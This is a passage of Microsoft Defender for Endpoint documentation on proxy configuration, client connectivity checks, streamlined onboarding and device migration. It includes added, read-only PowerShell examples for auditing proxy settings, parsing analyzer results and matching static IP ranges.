For resiliency purposes and the real-time nature of cloud-delivered protection, Microsoft Defender
Antivirus will cache the last known working proxy. Ensure your proxy solution does not perform SSL
inspection; this will break the secure cloud connection.

Microsoft Defender Antivirus will not use the static proxy to connect to Windows Update or
Microsoft Update for downloading updates. Instead, it will use a system-wide proxy if configured to
use Windows Update, or the configured internal update source according to the configured fallback
order.

If required, you can use Administrative Templates > Windows Components > Microsoft Defender
Antivirus > Define proxy auto-config (.pac) for connecting to the network. If you need to set up
advanced configurations with multiple proxies, use Administrative Templates > Windows
Components > Microsoft Defender Antivirus > Define addresses to bypass proxy server and
prevent Microsoft Defender Antivirus from using a proxy server for those destinations.

You can use PowerShell with the Set-MpPreference cmdlet to configure these options:

ProxyBypass
ProxyPacUrl
ProxyServer

Note

To use the proxy correctly, configure these three different proxy settings:

Microsoft Defender for Endpoint (MDE)
AV (Antivirus)
Endpoint Detection and Response (EDR)

Configure the proxy server manually using netsh command
Use netsh to configure a system-wide static proxy.

Note

This will affect all applications including Windows services which use WinHTTP with default
proxy.

1. Open an elevated command line:

a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.

2. Enter the following command and press Enter:

Windows Command Prompt

netsh winhttp set proxy <proxy>:<port>

For example: netsh winhttp set proxy 10.0.0.6:8080

To reset the winhttp proxy, enter the following command and press Enter:

Windows Command Prompt

netsh winhttp reset proxy

See Netsh Command Syntax, Contexts, and Formatting to learn more.
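Because the EDR sensor, Microsoft Defender Antivirus and WinHTTP each read their proxy from a different place, a device can end up with one path configured and the other two silently relying on WPAD or direct access. The following PowerShell is an added example (not from the Microsoft documentation) that reads all three in one pass and reports which of them has no explicit proxy. It only reads: the DataCollection and Windows Advanced Threat Protection policy keys and the Windows Defender policy key from this article, Get-MpPreference for the antivirus values, and the output of "netsh winhttp show proxy". The function names and the exact wording of the findings are assumptions.

```powershell
# Added example, not from the Microsoft documentation: a read-only audit of the three
# proxy paths this article configures (EDR sensor registry values, Microsoft Defender
# Antivirus preferences, and the system-wide WinHTTP proxy set with netsh).
function Get-MdeProxyConfiguration {
    # EDR sensor: the DataCollection policy values and the offline-device override
    $dc  = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection' -ErrorAction SilentlyContinue
    $atp = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection' -ErrorAction SilentlyContinue

    # Microsoft Defender Antivirus: the Group Policy value and the Set-MpPreference values
    $avPolicy = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -ErrorAction SilentlyContinue
    $mp = $null
    try { $mp = Get-MpPreference -ErrorAction Stop } catch { }   # absent when Defender AV is not installed

    # WinHTTP: parse "Proxy Server(s) :  host:port" from netsh; no match means direct access
    $netsh = (& netsh.exe winhttp show proxy) -join ' '
    $winhttpProxy = if ($netsh -match 'Proxy Server\(s\)\s*:\s*(\S+)') { $Matches[1] } else { $null }

    [pscustomobject]@{
        EdrTelemetryProxyServer       = $dc.TelemetryProxyServer
        EdrDisableEnterpriseAuthProxy = $dc.DisableEnterpriseAuthProxy
        EdrPreferStaticProxy          = $atp.PreferStaticProxyForHttpRequest
        AvPolicyProxyServer           = $avPolicy.ProxyServer
        AvProxyServer                 = if ($mp) { $mp.ProxyServer } else { $null }
        AvProxyPacUrl                 = if ($mp) { $mp.ProxyPacUrl } else { $null }
        AvProxyBypass                 = if ($mp) { @($mp.ProxyBypass) -join ';' } else { $null }
        WinHttpProxy                  = $winhttpProxy
    }
}

function Test-MdeProxyConfiguration {
    # Returns a list of findings; an empty list means each of the three paths has an explicit proxy.
    $cfg = Get-MdeProxyConfiguration
    $findings = @()
    if (-not $cfg.EdrTelemetryProxyServer) {
        $findings += 'EDR: TelemetryProxyServer not set (sensor relies on the WinHTTP proxy, transparent proxy/WPAD, or direct access)'
    } elseif ($cfg.EdrDisableEnterpriseAuthProxy -ne 1) {
        $findings += 'EDR: TelemetryProxyServer is set but DisableEnterpriseAuthProxy is not 1'
    }
    if (-not ($cfg.AvProxyServer -or $cfg.AvProxyPacUrl -or $cfg.AvPolicyProxyServer)) {
        $findings += 'AV: no Defender Antivirus ProxyServer or ProxyPacUrl configured'
    }
    if (-not $cfg.WinHttpProxy) {
        $findings += 'WinHTTP: direct access (no netsh winhttp proxy); expected when WPAD or a transparent proxy is in use'
    }
    return $findings
}

Get-MdeProxyConfiguration | Format-List
Test-MdeProxyConfiguration
```

Run it after applying either of the manual methods above and again after a Group Policy refresh; a WinHTTP finding on its own is normal in a WPAD or transparent-proxy topology, whereas an EDR or AV finding on a device that has no direct Internet access is the usual cause of a sensor that appears onboarded but never reports.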

Next step
STEP 3: Verify client connectivity to Microsoft Defender for Endpoint service URLs

Related articles
Disconnected environments, proxies and Microsoft Defender for Endpoint
Use Group Policy settings to configure and manage Microsoft Defender Antivirus
Onboard Windows devices
Troubleshoot Microsoft Defender for Endpoint onboarding issues
Onboard devices without Internet access to Microsoft Defender for Endpoint

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community:
Microsoft Defender for Endpoint Tech Community.


STEP 3: Verify client connectivity to
Microsoft Defender for Endpoint service
URLs
Article • 10/25/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Check that clients are able to connect to the Defender for Endpoint service URLs using
the Defender for Endpoint Client Analyzer to ensure that endpoints are able to
communicate telemetry to the service.

For more information on the Defender for Endpoint Client Analyzer, see Troubleshoot
sensor health using Microsoft Defender for Endpoint Client Analyzer.

Note

You can run the Defender for Endpoint Client Analyzer on devices prior to
onboarding and after onboarding.

When testing on a device onboarded to Defender for Endpoint, the tool will
use the onboarding parameters.
When testing on a device not yet onboarded to Defender for Endpoint, the
tool will use the defaults of US, UK, and EU.

Note (Applies to public preview)

For the streamlined onboarding public preview, when testing connectivity on
devices not yet onboarded to Defender for Endpoint, run mdeclientanalyzer.cmd
with -o <path to MDE onboarding package>. The command will use geo parameters
from the onboarding script to test connectivity. Otherwise, the default
pre-onboarding test runs against the standard URL set. See the following section for
more details.

Verify that the proxy configuration is completed successfully: WinHTTP can then
discover and communicate through the proxy server in your environment, and the
proxy server allows traffic to the Defender for Endpoint service URLs.

1. Download the Microsoft Defender for Endpoint Client Analyzer tool to the device
where the Defender for Endpoint sensor is running.

2. Extract the contents of MDEClientAnalyzer.zip on the device.

3. Open an elevated command line:

a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.

4. Enter the following command and press Enter:

command

HardDrivePath\MDEClientAnalyzer.cmd

Replace HardDrivePath with the path, where the MDEClientAnalyzer tool was
downloaded. For example:

command

C:\Work\tools\MDEClientAnalyzer\MDEClientAnalyzer.cmd

5. The tool creates and extracts the MDEClientAnalyzerResult.zip file in the
HardDrivePath folder.

6. Open MDEClientAnalyzerResult.txt and verify that you've performed the proxy
configuration steps to enable server discovery and access to the service URLs.

The tool checks the connectivity of the Defender for Endpoint service URLs. Ensure the
Defender for Endpoint client is configured to interact with them. The tool prints the results
in the MDEClientAnalyzerResult.txt file for each URL that can potentially be used to
communicate with the Defender for Endpoint services. For example:

text

Testing URL : https://xxx.microsoft.com/xxx
1 - Default proxy: Succeeded (200)
2 - Proxy auto discovery (WPAD): Succeeded (200)
3 - Proxy disabled: Succeeded (200)
4 - Named proxy: Doesn't exist
5 - Command line proxy: Doesn't exist

If any one of the connectivity options returns a (200) status, then the Defender for
Endpoint client can communicate with the tested URL properly using this connectivity
method.

However, if the connectivity check results indicate a failure, an HTTP error is displayed
(see HTTP Status Codes). You can then use the URLs in the table shown in Enable access
to Defender for Endpoint service URLs in the proxy server. The URLs available for use
depend on the region selected during the onboarding procedure.
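On a fleet this file is easier to triage with a script than by eye. The PowerShell below is an added example (not from the Microsoft documentation or the Client Analyzer itself) that parses the per-URL blocks in the format shown above and lists the URLs for which none of the five methods returned a 200, together with what each method reported. The sample input is constructed: the first block is the article's example, and the second URL and its 407 responses are invented to show a failing case; the function names are assumptions.

```powershell
# Added example, not from the Microsoft documentation: parse the per-URL blocks that
# MDEClientAnalyzerResult.txt prints and list the URLs for which no method returned 200.
function ConvertFrom-MdeConnectivityResult {
    param([Parameter(Mandatory = $true)][string[]]$Lines)

    $results = New-Object System.Collections.Generic.List[object]
    $current = $null
    foreach ($line in $Lines) {
        if ($line -match '^Testing URL\s*:\s*(\S+)') {
            if ($current) { $results.Add($current) }
            $current = [pscustomobject]@{ Url = $Matches[1]; Methods = @(); Working = @() }
            continue
        }
        # Method lines look like "1 - Default proxy: Succeeded (200)" or "4 - Named proxy: Doesn't exist"
        if ($current -and $line -match '^\s*\d+\s*-\s*(?<method>[^:]+):\s*(?<status>.+?)(\s*\((?<code>\d{3})\))?\s*$') {
            $method = $Matches['method'].Trim()
            $status = $Matches['status'].Trim()
            $code   = if ($Matches['code']) { [int]$Matches['code'] } else { $null }
            $current.Methods += [pscustomobject]@{ Method = $method; Status = $status; HttpCode = $code }
            if ($code -eq 200) { $current.Working += $method }
        }
    }
    if ($current) { $results.Add($current) }
    return $results.ToArray()
}

function Get-MdeUnreachableUrl {
    # One row per URL that no connectivity method could reach, with every method's result
    param([Parameter(Mandatory = $true)][string[]]$Lines)
    ConvertFrom-MdeConnectivityResult -Lines $Lines |
        Where-Object { $_.Working.Count -eq 0 } |
        ForEach-Object {
            $detail = ($_.Methods | ForEach-Object { ('{0}={1} {2}' -f $_.Method, $_.Status, $_.HttpCode).Trim() }) -join '; '
            [pscustomobject]@{ Url = $_.Url; Results = $detail }
        }
}

# Constructed sample in the tool's output format; for a real run use:
#   Get-MdeUnreachableUrl -Lines (Get-Content .\MDEClientAnalyzerResult.txt)
$sample = @'
Testing URL : https://xxx.microsoft.com/xxx
1 - Default proxy: Succeeded (200)
2 - Proxy auto discovery (WPAD): Succeeded (200)
3 - Proxy disabled: Succeeded (200)
4 - Named proxy: Doesn't exist
5 - Command line proxy: Doesn't exist
Testing URL : https://example.invalid/blocked
1 - Default proxy: Failed (407)
2 - Proxy auto discovery (WPAD): Failed (407)
3 - Proxy disabled: Failed (407)
4 - Named proxy: Doesn't exist
5 - Command line proxy: Doesn't exist
'@ -split "`r?`n"

Get-MdeUnreachableUrl -Lines $sample | Format-Table -AutoSize
```

Only the second, constructed URL is listed, because a single 200 on any method is enough for the client to use that URL. When the real file produces rows, compare the listed URLs against the region-specific table in Enable access to Defender for Endpoint service URLs in the proxy server before changing anything on the proxy.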

Note

The Connectivity Analyzer tool's cloud connectivity checks are not compatible with
the Attack Surface Reduction rule Block process creations originating from PSExec
and WMI commands. You will need to temporarily disable this rule to run the
connectivity tool. Alternatively, you can temporarily add ASR exclusions when
running the analyzer.

When TelemetryProxyServer is set in the registry or via Group Policy, Defender for
Endpoint will fall back to a direct connection if it fails to access the defined proxy.

(Public preview) Testing connectivity to the streamlined onboarding method
If you're testing connectivity on a device that hasn't yet been onboarded to Defender
for Endpoint using the streamlined approach (relevant for both new and migrating
devices):

1. Download the streamlined onboarding package for the relevant OS.

2. Extract the .cmd from the onboarding package.

3. Follow the instructions in the previous section to download the Client Analyzer.

4. Run mdeclientanalyzer.cmd -o <path to onboarding cmd file> from within the
MDEClientAnalyzer folder. The command uses geo parameters from the
onboarding script to test connectivity.

If you're testing connectivity on a device onboarded to Defender for Endpoint using the
streamlined onboarding package, run the Defender for Endpoint Client Analyzer as
normal. The tool uses the configured onboarding parameters to test connectivity.

For more info on how to access streamlined onboarding script, see Onboarding devices
using streamlined device connectivity.

Next step
Onboard Windows Client
Onboard Windows Server
Onboard non-Windows devices


Onboarding devices using streamlined
connectivity for Microsoft Defender for
Endpoint
Article • 02/01/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Note

The streamlined onboarding method is currently in public preview. Make sure to
review the prerequisites to confirm requirements and supported operating systems.

The Microsoft Defender for Endpoint service may require the use of proxy
configurations to report diagnostic data and communicate data to the service. Prior to
the availability of the streamlined connectivity method, other URLs were required and
Defender for Endpoint static IP ranges weren't supported. For more information on full
MDE connectivity processes, see STEP 1: Configure your network environment to ensure
connectivity with Defender for Endpoint service.

This article describes the streamlined device connectivity method and how to onboard
new devices to use a simpler deployment and management of Defender for Endpoint
cloud connectivity services. For more information on migrating previously onboarded
devices, see Migrating devices to streamlined connectivity.

To simplify network configuration and management, you now have the option of
onboarding devices to Defender for Endpoint using a reduced URL set or static IP
ranges. See the streamlined URL list.

The Defender for Endpoint-recognized simplified domain
*.endpoint.security.microsoft.com replaces the following core Defender for Endpoint
services:

Cloud Protection/MAPS
Malware Sample Submission Storage
Auto-IR Sample Storage
Defender for Endpoint Command & Control
EDR Cyberdata

To support network devices without hostname resolution or wildcard support, you can
alternatively configure connectivity using dedicated Defender for Endpoint static IP
ranges. For more information, see Configure connectivity using static IP ranges.

Note

The simplified connectivity method will not change how Microsoft Defender for
Endpoint functions on a device nor will it change the end-user experience. Only
the URLs or IPs that a device uses to connect to the service will change.

Important

Preview limitations and known issues:

Streamlined connectivity does not support onboarding through API (includes
Microsoft Defender for Cloud and Intune).
This onboarding method has specific prerequisites that do not apply to the
standard onboarding method.

Consolidated services
The following Defender for Endpoint URLs consolidated under the streamlined domain
should no longer be required for connectivity if *.endpoint.security.microsoft.com is
allowed and devices are onboarded using the streamlined onboarding package. You will
need to maintain connectivity with other required services not consolidated that are
relevant to your organization (for example, CRL, SmartScreen/Network Protection, and
WNS).

For the updated list of required URLs, see Download the spreadsheet here.

Important

If you are configuring using IP ranges, you will need to separately configure the
EDR cyberdata service. This service is not consolidated on an IP level. See the section
below for more details.

Category: MAPS: cloud-delivered protection
Consolidated URLs:
*.wdcp.microsoft.com
*.wd.microsoft.com

Category: Cloud protection & security intelligence updates for macOS and Linux
Consolidated URLs:
unitedstates.x.cp.wd.microsoft.com
europe.x.cp.wd.microsoft.com
unitedkingdom.x.cp.wd.microsoft.com
x.cp.wd.microsoft.com
https://www.microsoft.com/security/encyclopedia/adlpackages.aspx

Category: Malware Sample Submission Storage
Consolidated URLs:
ussus1eastprod.blob.core.windows.net
ussus2eastprod.blob.core.windows.net
ussus3eastprod.blob.core.windows.net
ussus4eastprod.blob.core.windows.net
wsus1eastprod.blob.core.windows.net
wsus2eastprod.blob.core.windows.net
ussus1westprod.blob.core.windows.net
ussus2westprod.blob.core.windows.net
ussus3westprod.blob.core.windows.net
ussus4westprod.blob.core.windows.net
wsus1westprod.blob.core.windows.net
wsus2westprod.blob.core.windows.net
usseu1northprod.blob.core.windows.net
wseu1northprod.blob.core.windows.net
usseu1westprod.blob.core.windows.net
wseu1westprod.blob.core.windows.net
ussuk1southprod.blob.core.windows.net
wsuk1southprod.blob.core.windows.net
ussuk1westprod.blob.core.windows.net
wsuk1westprod.blob.core.windows.net

Category: Defender for Endpoint Auto-IR Sample Storage
Consolidated URLs:
automatedirstrprdcus.blob.core.windows.net
automatedirstrprdeus.blob.core.windows.net
automatedirstrprdcus3.blob.core.windows.net
automatedirstrprdeus3.blob.core.windows.net
automatedirstrprdneu.blob.core.windows.net
automatedirstrprdweu.blob.core.windows.net
automatedirstrprdneu3.blob.core.windows.net
automatedirstrprdweu3.blob.core.windows.net
automatedirstrprduks.blob.core.windows.net
automatedirstrprdukw.blob.core.windows.net

Category: Defender for Endpoint Command and Control
Consolidated URLs:
winatp-gw-cus.microsoft.com
winatp-gw-eus.microsoft.com
winatp-gw-cus3.microsoft.com
winatp-gw-eus3.microsoft.com
winatp-gw-neu.microsoft.com
winatp-gw-weu.microsoft.com
winatp-gw-neu3.microsoft.com
winatp-gw-weu3.microsoft.com
winatp-gw-uks.microsoft.com
winatp-gw-ukw.microsoft.com

Category: EDR Cyberdata
Consolidated URLs:
events.data.microsoft.com
us-v20.events.data.microsoft.com
eu-v20.events.data.microsoft.com
uk-v20.events.data.microsoft.com

Before you begin
Devices must meet specific prerequisites to use the streamlined connectivity method for
Defender for Endpoint. Ensure the prerequisites are met before proceeding with
onboarding.

Prerequisites
License:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender Vulnerability Management

Minimum KB update (Windows):

SENSE version: 10.8040.* / March 8, 2022 or higher (see table)

Microsoft Defender Antivirus versions (Windows):

Antimalware Client: 4.18.2211.5
Engine: 1.1.19900.2
Antivirus (Security Intelligence): 1.391.345.0

Defender Antivirus versions (macOS/Linux):

macOS supported versions with MDE product version 101.23102.*+
Linux supported versions with MDE product version 101.23102.*+

Supported Operating Systems:

Windows 10 version 1809 or later
Windows 10 versions 1607, 1703, 1709, 1803 are supported on the streamlined
onboarding package but require a different URL list; see the streamlined URL sheet
Windows 11
Windows Server 2019
Windows Server 2022
Windows Server 2012 R2, Server 2016 R2, fully updated, running the Defender for
Endpoint modern unified solution (installation through MSI)
macOS supported versions with MDE product version 101.23102.*+
Linux supported versions with MDE product version 101.23102.*+

Important

Devices running on the MMA agent are not supported on the streamlined
connectivity method and will need to continue using the standard URL set
(Windows 7, Windows 8.1, Windows Server 2008 R2 MMA, Server 2012 &
2016 R2 not upgraded to the modern unified agent).
Windows Server 2012 R2 and Server 2016 R2 will need to upgrade to the unified
agent to leverage the new method.
Windows 10 1607, 1703, 1709, 1803 can leverage the new onboarding option
but will use a longer list. For more information, see the streamlined URL sheet.

Windows OS: Minimum KB Required (March 8, 2022)

Windows 11: KB5011493 (March 8, 2022)
Windows 10 1809, Windows Server 2019: KB5011503 (March 8, 2022)
Windows 10 19H2 (1909): KB5011485 (March 8, 2022)
Windows 10 20H2, 21H2: KB5011487 (March 8, 2022)
Windows 10 22H2: KB5020953 (October 28, 2022)
Windows 10 1803*: < end of service >
Windows 10 1709*: < end of service >
Windows Server 2022: KB5011497 (March 8, 2022)
Windows Server 2012 R2, 2016*: Unified Agent
Windows Server 2016 R2: Unified Agent

Streamlined connectivity process
The following illustration shows the streamlined connectivity process and the
corresponding stages:

Stage 1. Configure your network environment for cloud connectivity
Once you confirm prerequisites are met, ensure your network environment is properly
configured to support the streamlined connectivity method. Using the streamlined
method (preview), follow the steps outlined in Configure your network environment to
ensure connectivity with Defender for Endpoint service.

Defender for Endpoint services consolidated under the simplified method should no
longer be required for connectivity. However, some URLs aren't included in the
consolidation.

Streamlined connectivity allows you to use one of the following options to configure cloud
connectivity:

Option 1: Use the simplified domain
Option 2: Use static IP ranges

Option 1: Configure connectivity using the simplified domain

Configure your environment to allow connections with the simplified Defender for
Endpoint domain: *.endpoint.security.microsoft.com . For more information, see
Configure your network environment to ensure connectivity with Defender for Endpoint
service.

You must maintain connectivity with remaining required services listed under the
updated list . For example, Certification Revocation List, Windows update,
SmartScreen.

Option 2: Configure connectivity using static IP ranges

With streamlined connectivity, IP-based solutions can be used as an alternative to URLs.
These IPs cover the following services:

MAPS
Malware Sample Submission Storage
Auto-IR Sample Storage
Defender for Endpoint Command and Control

Important

The EDR Cyber data service must be configured separately if you are using the IP
method (this service is only consolidated on a URL level). You must also maintain
connectivity with other required services including SmartScreen, CRL, Windows
Update, and other services.

In order to stay up to date on IP ranges, it is recommended to refer to the following
Azure service tags for Microsoft Defender for Endpoint services. The latest IP ranges will
always be found in the service tag. For more information, see Azure IP ranges.

Service tag name: Defender for Endpoint services included

MicrosoftDefenderForEndpoint: MAPS, Malware Sample Submission Storage, Auto-IR Sample
Storage, Command and Control.

OneDsCollector: EDR Cyberdata. Note: The traffic under this service tag isn't limited to
Defender for Endpoint and may include diagnostic data traffic for other Microsoft services.

The following table lists the current static IP ranges. For latest list, refer to the Azure
service tags.

Geo: IP Ranges

US: 20.15.141.0/24, 20.242.181.0/24, 20.10.127.0/24, 13.83.125.0/24
EU: 4.208.13.0/24, 20.8.195.0/24
UK: 20.26.63.224/28, 20.254.173.48/28
AU: 68.218.120.64/28, 20.211.228.80/28

Important

In compliance with Defender for Endpoint security and compliance standards, your
data will be processed and stored in accordance with your tenant's physical
location. Based on client location, traffic may flow through any of these IP regions
(which correspond to Azure datacenter regions). For more information, see Data
storage and privacy.
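When firewall rules are built from these ranges, the practical question during validation is whether a destination seen in the proxy or firewall log is one of the Defender for Endpoint static addresses and, if so, which geo it belongs to. The PowerShell below is an added example, not part of the Microsoft documentation; it embeds the ranges from the table above as a snapshot (the MicrosoftDefenderForEndpoint service tag remains the authoritative list) and does the CIDR match with integer arithmetic so the result is the same on Windows PowerShell 5.1 and PowerShell 7. The function names and the sample destination addresses are assumptions; the sample addresses are constructed, not captured traffic.

```powershell
# Added example, not from the Microsoft documentation: map an observed destination IP to
# the Defender for Endpoint static IP geo using the ranges in the table above. The table
# is a snapshot; the MicrosoftDefenderForEndpoint service tag is the authoritative list.
$MdeStaticIpRanges = @{
    US = '20.15.141.0/24', '20.242.181.0/24', '20.10.127.0/24', '13.83.125.0/24'
    EU = '4.208.13.0/24', '20.8.195.0/24'
    UK = '20.26.63.224/28', '20.254.173.48/28'
    AU = '68.218.120.64/28', '20.211.228.80/28'
}

function ConvertTo-IPv4Integer {
    # Dotted quad to a 64-bit integer, most significant octet first (no bit shifts, so no sign surprises)
    param([Parameter(Mandatory = $true)][string]$Address)
    $ip = [System.Net.IPAddress]::Parse($Address)
    if ($ip.AddressFamily -ne [System.Net.Sockets.AddressFamily]::InterNetwork) {
        throw "Only IPv4 is handled here (the service does not support IPv6-only devices)"
    }
    [long]$value = 0
    foreach ($octet in $ip.GetAddressBytes()) { $value = $value * 256 + $octet }
    return $value
}

function Test-IPv4InCidr {
    param([Parameter(Mandatory = $true)][string]$Address,
          [Parameter(Mandatory = $true)][string]$Cidr)
    $network, $prefix = $Cidr -split '/'
    # Drop the host bits on both sides with integer division and compare the network part
    $scale = [long][math]::Pow(2, 32 - [int]$prefix)
    $addressNet = [math]::Floor((ConvertTo-IPv4Integer -Address $Address) / $scale)
    $rangeNet   = [math]::Floor((ConvertTo-IPv4Integer -Address $network) / $scale)
    return ($addressNet -eq $rangeNet)
}

function Get-MdeStaticIpGeo {
    # Returns the geo label (US, EU, UK, AU) or $null when the address is outside every range
    param([Parameter(Mandatory = $true)][string]$Address)
    foreach ($geo in $MdeStaticIpRanges.Keys) {
        foreach ($cidr in $MdeStaticIpRanges[$geo]) {
            if (Test-IPv4InCidr -Address $Address -Cidr $cidr) { return $geo }
        }
    }
    return $null
}

# Constructed sample of destinations as they might appear in a firewall log (not real data):
# one from each of US, UK and EU, and one just outside the UK /28 (which ends at .239)
$observed = '20.15.141.77', '20.26.63.230', '20.26.63.250', '4.208.13.9'
foreach ($dest in $observed) {
    $geo = Get-MdeStaticIpGeo -Address $dest
    '{0,-16} {1}' -f $dest, $(if ($geo) { "MDE static range ($geo)" } else { 'not in MDE static ranges' })
}
```

Because traffic may flow through any of these regions depending on client location, an allow list that covers only the tenant's own geo will show up in this check as destinations that match a different geo, which is a configuration gap rather than unexpected traffic; an address that matches no range should be compared against the current service tag before it is treated as either.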

Stage 2. Configure your devices to connect to Defender for Endpoint service
Configure devices to communicate through your connectivity infrastructure. Ensure
devices meet prerequisites and have updated sensor and Microsoft Defender Antivirus
versions. For more information, see Configure device proxy and Internet connection
settings.

Stage 3. Verify client connectivity preonboarding
For more information, see Verify client connectivity.

The following preonboarding checks can be run with both the Windows and the cross-platform (Xplat)
MDE Client Analyzer: Download the Microsoft Defender for Endpoint client analyzer.

To test streamlined connectivity for devices not yet onboarded to Defender for
Endpoint, you can use the Client Analyzer for Windows using the following commands:

Run mdeclientanalyzer.cmd -o <path to cmd file> from within the MDEClientAnalyzer
folder. The command uses parameters from the onboarding package to test
connectivity.

Run mdeclientanalyzer.cmd -g <GW_US, GW_UK, GW_EU>, where the parameter is one of
GW_US, GW_EU, GW_UK. GW refers to the streamlined option. Run with the applicable
tenant geo.

As a supplementary check, you can also use the client analyzer to test whether a device
meets pre-requisites: https://aka.ms/BetaMDEAnalyzer

Note

For devices not yet onboarded to Defender for Endpoint, client analyzer will test
against standard set of URLs. To test the streamlined approach, you will need to run
with the switches listed earlier in this article.

Stage 4. Apply the new onboarding package required for streamlined connectivity
Once you configure your network to communicate with the full list of services, you can
begin onboarding devices using the streamlined method. Note that onboarding via API
isn't currently supported (includes Intune & Microsoft Defender for Cloud).

Before proceeding, confirm devices meet the prerequisites and have updated the sensor
and Microsoft Defender Antivirus versions.
To get the new package, in Microsoft Defender XDR, select Settings > Endpoints >
Device management > Onboarding.

Select the applicable operating system and choose "Streamlined (preview)" from the
Connectivity type dropdown menu.

For new devices (not onboarded to Defender for Endpoint) supported under this
method, follow the onboarding steps from previous sections using the updated onboarding
package with your preferred deployment method:

Onboard Windows Client
Onboard Windows Server
Onboard non-Windows devices
Run a detection test on a device to verify it has been properly onboarded to
Microsoft Defender for Endpoint

Exclude devices from any existing onboarding policies that use the standard onboarding
package.

For migrating devices already onboarded to Defender for Endpoint, see Migrating
devices to the streamlined connectivity. You must reboot your device and follow specific
guidance here.

When you're ready to set the default onboarding package to streamlined, you can turn
on the following Advanced Feature setting in the Microsoft Defender portal (Settings >
Endpoints > Advanced Features).

Note
Before moving forward with this option, validate that your environment is ready
and all devices meet prerequisites.

This setting sets the default onboarding package to 'streamlined' for applicable
operating systems. You can still use the standard onboarding package within the
onboarding page but you must specifically select it in the drop-down.


Migrate devices to use the streamlined
connectivity method
Article • 02/01/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

This article describes how to migrate (reonboard) devices that are currently onboarded
to Defender for Endpoint to use the streamlined device connectivity method. For more
information on streamlined connectivity, see Onboarding devices using streamlined
connectivity. Devices must meet the prerequisites listed in Streamlined connectivity.

In most cases, full device offboarding isn't required when reonboarding. You can run the
updated onboarding package and reboot your device to switch connectivity over. See
below for details on individual operating systems.

Important

Preview limitations and known issues:

For device migrations (reonboarding): Offboarding is not required to switch
over to the streamlined connectivity method. Once the updated onboarding
package is run, a full device reboot is required for Windows devices and a
service restart for macOS and Linux. For more information, see the details
included in this article.
Windows 10 versions 1607, 1703, 1709, and 1803 do not support
reonboarding. Offboard first and then onboard using the updated package.
These versions also require a longer URL list.
Devices running the MMA agent are not supported and must continue using
the MMA onboarding method.

Migrating devices using the streamlined method

Migration recommendation:

Start small. It's recommended to start with a small set of devices first, apply the
onboarding blob using any of the supported deployment tools, then monitor for
connectivity. If you are using a new onboarding policy, to prevent conflicts make
sure to exclude devices from any other existing onboarding policies.

Validate and monitor. After onboarding the small set of devices, validate that
devices have successfully onboarded and are communicating with the service.

Complete migration. At this stage, you can gradually roll out the migration to a
larger set of devices. To complete the migration, you can replace previous
onboarding policies and remove the old URLs from your network device.

Validate device prerequisites before proceeding with any migrations. This information
builds upon the previous article by focusing on migrating existing devices.

To reonboard devices, you will need to use the streamlined onboarding package. For
more information on how to access the package, see Streamlined connectivity.

Depending on the OS, migrations may require a device reboot or service restart once
the onboarding package is applied:

Windows: Reboot the device.

macOS: Reboot the device or restart the Defender for Endpoint service by running:

1. sudo launchctl unload /Library/LaunchDaemons/com.microsoft.fresno.plist
2. sudo launchctl load /Library/LaunchDaemons/com.microsoft.fresno.plist

Linux: Restart the Defender for Endpoint service by running: sudo systemctl restart mdatp

The following table lists migration instructions for the available onboarding tools based
on the device's operating system.
Windows 10 and 11

Important

Windows 10 version 1607, 1703, 1709, and 1803 do not support reonboarding.
To migrate existing devices, you will need to fully offboard and onboard using
the streamlined onboarding package.

For general information on onboarding Windows client devices, see Onboarding
Windows Client.

Confirm prerequisites are met: Prerequisites for using streamlined method.

Local script
Follow the guidance in Local script (up to 10 devices) using the streamlined
onboarding package. After completing the steps, you must restart the device for
device connectivity to switch over.

Group policy
Follow the guidance in Group policy using the streamlined onboarding package.
After completing the steps, you must restart the device for device connectivity to
switch over.

Microsoft Intune
Follow the guidance in Intune using the streamlined onboarding package. After
completing the steps, you must restart the device for device connectivity to switch
over.

Microsoft Configuration Manager
Follow the guidance in Configuration Manager.

VDI
Use the guidance in Onboard nonpersistent virtual desktop infrastructure (VDI)
devices. After completing the steps, you must restart the device for device
connectivity to switch over.

Verifying device connectivity with streamlined method for migrated devices
You can use the following methods to check that you have successfully connected
Windows devices:

Client analyzer
Tracking with advanced hunting in Microsoft Defender XDR
Track locally using Event Viewer (for Windows)
Run tests to confirm connectivity with Defender for Endpoint services
Checking the registry editor
PowerShell detection test

For macOS and Linux, you can use the following methods:

MDATP connectivity tests
Tracking with advanced hunting in Microsoft Defender XDR
Run tests to confirm connectivity with Defender for Endpoint services

Use Defender for Endpoint Client Analyzer (Windows) to validate connectivity after onboarding for migrated endpoints
Once onboarded, run the MDE Client Analyzer to confirm your device is connecting to
the appropriate updated URLs.

Download the Microsoft Defender for Endpoint Client Analyzer tool where Defender for
Endpoint sensor is running.

You can follow the same instructions as in Verify client connectivity to Microsoft
Defender for Endpoint service. The script automatically uses the onboarding package
configured on the device (should be streamlined version) to test connectivity.

Ensure connectivity is established with the appropriate URLs.


Tracking with advanced hunting in Microsoft Defender XDR
You can use advanced hunting in Microsoft Defender portal to view the connectivity
type status.

This information is found in the DeviceInfo table under the ConnectivityType column:

Column name: ConnectivityType
Possible values: <blank>, Streamlined, Standard
Data type: String
Description: Type of connectivity from the device to the cloud

Once a device is migrated to use the streamlined method and the device establishes
successful communication with the EDR command & control channel, the value is
reported as "Streamlined".

